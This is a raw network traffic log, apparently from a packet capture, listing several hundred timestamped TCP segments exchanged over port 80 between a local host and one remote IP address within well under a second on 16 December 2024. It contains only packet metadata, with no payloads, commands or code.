Dec 16, 2024 11:03:20.949522972 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.949548960 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.949592113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.950642109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.950691938 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.950766087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.950810909 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.951823950 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.951877117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.951908112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.952917099 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.952985048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.084548950 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.084641933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.084659100 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.084804058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.085007906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.085076094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.085129976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.086172104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.086218119 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.086293936 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.086342096 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.087343931 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.087395906 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.087436914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.087481022 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.088468075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.088512897 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.088546038 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.088587999 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.089683056 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.089731932 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.089770079 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.089814901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.090806007 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.090847969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.091084003 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.091126919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.091950893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.091995955 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.092091084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.092133999 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.093086958 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.093135118 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.093199968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.093265057 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.094254971 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.094299078 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.094419956 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.094465017 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.095465899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.095532894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.095607996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.095652103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.096638918 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.096684933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.096725941 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.096776962 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.097718000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.097763062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.097825050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.097868919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.098917007 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.098968029 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.099061966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.099112034 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.100151062 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.100198030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.100245953 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.100291967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.101181030 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.101226091 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.101290941 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.101335049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.102377892 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.102422953 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.102509975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.102550030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.103662968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.103707075 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.103799105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.103842020 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.104684114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.104728937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.104816914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.104861975 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.105793953 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.105840921 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.105906010 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.105951071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.107130051 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.107175112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.107214928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.107259035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.108303070 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.108328104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.108350992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.108366013 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.109323978 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.109366894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.109386921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.109430075 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.110440016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.110483885 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.110522985 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.110567093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.111610889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.111656904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.111690044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.111733913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.112782955 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.112833023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.112914085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.112957954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.113940954 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.113986015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.114016056 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.114061117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.115138054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.115191936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.115525961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.115577936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.116431952 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.116480112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.116519928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.116569042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.117382050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.117429972 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.117486954 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.117532969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.118539095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.118582964 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.118670940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.118711948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.119689941 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.119740963 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.119745970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.119793892 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.120832920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.120876074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.120944977 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.120990038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.122004032 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.122051954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.122126102 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.122173071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.123147964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.123203993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.123270035 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.123321056 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.124326944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.124376059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.124464989 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.124511003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.125488997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.125534058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.125619888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.125694036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.126615047 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.126662016 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.126729012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.126775980 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.127851009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.127892971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.128004074 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.128050089 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.128933907 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.128981113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.129025936 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.129069090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.130119085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.130162954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.130263090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.130301952 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.131223917 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.131274939 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.131306887 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.131350040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.132421970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.132464886 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.132558107 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.132599115 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.133639097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.133687973 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.133868933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.133917093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.134712934 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.134769917 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.134891987 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.134938955 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.135874987 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.135921955 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.135981083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.136027098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.137088060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.137136936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.137192011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.137238026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.138257027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.138303995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.138416052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.138463974 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.139337063 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.139384985 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.139451027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.139524937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.140495062 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.140539885 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.140611887 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.140656948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.141648054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.141699076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.141768932 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.141815901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.142889023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.142932892 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.142997980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.143042088 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.143979073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.144041061 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.144113064 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.144156933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.145049095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.145093918 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.277204990 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.277277946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.277384043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.277833939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.277887106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.277961969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.278002024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.278990984 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.279048920 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.279104948 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.279153109 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.280282974 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.280333042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.280335903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.280379057 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.281282902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.281339884 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.281394005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.281436920 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.282471895 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.282529116 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.282588005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.282635927 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.283593893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.283674002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.283709049 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.283767939 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.284778118 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.284898996 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.284919977 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.284960985 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.285922050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.285980940 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.286034107 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.286082029 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.287162066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.287266970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.287367105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.287543058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.288228035 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.288348913 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.288397074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.289400101 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.289568901 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.289622068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.290513992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.290575027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.290575027 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.290618896 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.291698933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.291764975 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.291793108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.291836977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.292851925 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.292901993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.292962074 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.293013096 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.294008970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.294058084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.294118881 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.294167042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.295178890 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.295231104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.295308113 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.295664072 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.296329021 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.296449900 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.296458006 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.296498060 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.297465086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.297518015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.297594070 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.297650099 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.298621893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.298672915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.298723936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.299818039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.299868107 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.299869061 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.299911976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.300945044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.301074028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.301126957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.302086115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.302136898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.302208900 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.302256107 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.303252935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.303330898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.303396940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.303445101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.304424047 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.304474115 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.304527044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.304578066 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.305625916 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.305665016 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.305725098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.305773973 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.306684971 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.306730986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.306842089 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.306885958 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.307940960 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.308032990 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.308079004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.309011936 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.309056997 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.309122086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.309171915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.310178041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.310273886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.310318947 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.311305046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.311357975 CET	49800	80	192.168.2.5	31.41.244.11
